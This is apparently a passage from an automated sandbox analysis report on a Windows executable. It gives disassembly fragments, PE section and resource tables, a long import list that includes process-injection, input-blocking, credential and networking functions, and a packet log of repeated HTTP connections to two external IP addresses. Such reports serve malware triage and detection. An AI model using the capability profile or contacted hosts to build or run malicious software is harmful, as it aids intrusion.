                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FDF8h
                                  mov dword ptr [ecx], 0049FDF0h
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007F6BD4F4673Ah
                                  mov dword ptr [esi], 0049FE0Ch
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FE14h
                                  mov dword ptr [ecx], 0049FE0Ch
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  and dword ptr [eax], 00000000h
                                  and dword ptr [eax+04h], 00000000h
                                  push eax
                                  mov eax, dword ptr [ebp+08h]
                                  add eax, 04h
                                  push eax
                                  call 00007F6BD4F4932Dh
                                  pop ecx
                                  pop ecx
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  lea eax, dword ptr [ecx+04h]
                                  mov dword ptr [ecx], 0049FDD0h
                                  push eax
                                  call 00007F6BD4F49378h
                                  pop ecx
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  push eax
                                  call 00007F6BD4F49361h
                                  test byte ptr [ebp+08h], 00000001h
                                  pop ecx
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xcdc80.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a20000x7594.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0xd40000xcdc800xcde00672a93f6143d6b71bddbd92e4ca41f5cFalse0.9680859137826351data7.9699440172587215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1a20000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                  RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                  RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                  RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                  RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                  RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                  RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                  RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                  RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                  RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                  RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                  RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                  RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                  RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                  RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                  RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                  RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                  RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                  RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                  RT_RCDATA0xdc7b80xc4f48data1.000317331244236
                                  RT_GROUP_ICON0x1a17000x76dataEnglishGreat Britain0.6610169491525424
                                  RT_GROUP_ICON0x1a17780x14dataEnglishGreat Britain1.25
                                  RT_GROUP_ICON0x1a178c0x14dataEnglishGreat Britain1.15
                                  RT_GROUP_ICON0x1a17a00x14dataEnglishGreat Britain1.25
                                  RT_VERSION0x1a17b40xdcdataEnglishGreat Britain0.6181818181818182
                                  RT_MANIFEST0x1a18900x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                  DLLImport
                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                  PSAPI.DLLGetProcessMemoryInfo
                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                  UxTheme.dllIsThemeActive
                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain
                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 16, 2024 09:29:57.445568085 CEST5580980192.168.2.4104.21.31.249
                                  Sep 16, 2024 09:29:57.450462103 CEST8055809104.21.31.249192.168.2.4
                                  Sep 16, 2024 09:29:57.450562954 CEST5580980192.168.2.4104.21.31.249
                                  Sep 16, 2024 09:29:57.457849026 CEST5580980192.168.2.4104.21.31.249
                                  Sep 16, 2024 09:29:57.462647915 CEST8055809104.21.31.249192.168.2.4
                                  Sep 16, 2024 09:29:57.902678013 CEST8055809104.21.31.249192.168.2.4
                                  Sep 16, 2024 09:29:57.903129101 CEST8055809104.21.31.249192.168.2.4
                                  Sep 16, 2024 09:29:57.903232098 CEST5580980192.168.2.4104.21.31.249
                                  Sep 16, 2024 09:29:57.915553093 CEST5580980192.168.2.4104.21.31.249
                                  Sep 16, 2024 09:29:57.920350075 CEST8055809104.21.31.249192.168.2.4
                                  Sep 16, 2024 09:30:13.122700930 CEST5581080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:13.127487898 CEST80558103.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:13.127564907 CEST5581080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:13.143157005 CEST5581080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:13.148021936 CEST80558103.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:13.603117943 CEST80558103.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:13.603391886 CEST5581080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:14.687742949 CEST5581080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:14.692580938 CEST80558103.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:15.699873924 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:15.704844952 CEST80558113.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:15.704967022 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:15.719965935 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:15.724827051 CEST80558113.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:16.171602964 CEST80558113.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:16.171756029 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:17.229444981 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:17.539061069 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:18.136841059 CEST80558113.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.136852026 CEST80558113.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.137048006 CEST5581180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:18.246782064 CEST5581280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:18.251604080 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.251708031 CEST5581280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:18.267452955 CEST5581280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:18.272764921 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272810936 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272831917 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272840977 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272851944 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272861958 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272870064 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272878885 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:18.272886992 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:19.648926973 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:19.649070978 CEST5581280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:19.773685932 CEST5581280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:19.870769024 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:19.870788097 CEST80558123.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:19.870857000 CEST5581280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:20.793602943 CEST5581380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:20.798624039 CEST80558133.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:20.798738956 CEST5581380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:20.808948994 CEST5581380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:20.813818932 CEST80558133.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:21.255518913 CEST80558133.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:21.255681038 CEST80558133.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:21.255764961 CEST5581380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:21.259320974 CEST5581380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:21.264094114 CEST80558133.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:26.294337988 CEST5581480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:26.305388927 CEST80558143.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:26.305501938 CEST5581480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:26.320586920 CEST5581480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:26.325444937 CEST80558143.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:26.785260916 CEST80558143.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:26.785434008 CEST5581480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:27.836164951 CEST5581480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:27.842231989 CEST80558143.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:28.854562998 CEST5581580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:28.862664938 CEST80558153.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:28.862802029 CEST5581580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:28.874934912 CEST5581580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:28.882612944 CEST80558153.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:30.384653091 CEST5581580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:30.391246080 CEST80558153.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:30.391329050 CEST5581580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:31.401271105 CEST5581680192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:31.406316042 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.406506062 CEST5581680192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:31.416431904 CEST5581680192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:31.421458006 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421477079 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421500921 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421514034 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421525955 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421662092 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421674013 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421700001 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.421713114 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.871375084 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:31.871464014 CEST5581680192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:32.929981947 CEST5581680192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:32.935106993 CEST80558163.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:33.949970007 CEST5581780192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:34.339433908 CEST80558173.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:34.339591026 CEST5581780192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:34.348057985 CEST5581780192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:34.353884935 CEST80558173.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:41.867685080 CEST80558173.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:41.867726088 CEST80558173.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:41.867847919 CEST5581780192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:41.870374918 CEST5581780192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:41.875247002 CEST80558173.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:46.929029942 CEST5581880192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:46.933983088 CEST80558183.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:46.934386015 CEST5581880192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:46.950253010 CEST5581880192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:46.955944061 CEST80558183.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:48.463015079 CEST5581880192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:48.468446016 CEST80558183.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:48.468534946 CEST5581880192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:49.481796980 CEST5581980192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:49.486664057 CEST80558193.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:49.486747026 CEST5581980192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:49.507642031 CEST5581980192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:49.513011932 CEST80558193.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:49.950542927 CEST80558193.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:49.950717926 CEST5581980192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:51.023659945 CEST5581980192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:51.028664112 CEST80558193.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.042999983 CEST5582080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:52.048044920 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.048125982 CEST5582080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:52.059668064 CEST5582080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:52.064651966 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064668894 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064682961 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064693928 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064706087 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064729929 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064742088 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064789057 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.064800978 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.513696909 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:52.515263081 CEST5582080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:53.583266020 CEST5582080192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:53.588139057 CEST80558203.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:54.598993063 CEST5582180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:54.603943110 CEST80558213.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:54.604026079 CEST5582180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:54.611202002 CEST5582180192.168.2.43.33.130.190
                                  Sep 16, 2024 09:30:54.616081953 CEST80558213.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:57.993134022 CEST80558213.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:57.993170977 CEST80558213.33.130.190192.168.2.4
                                  Sep 16, 2024 09:30:57.993371964 CEST5582180192.168.2.43.33.130.190
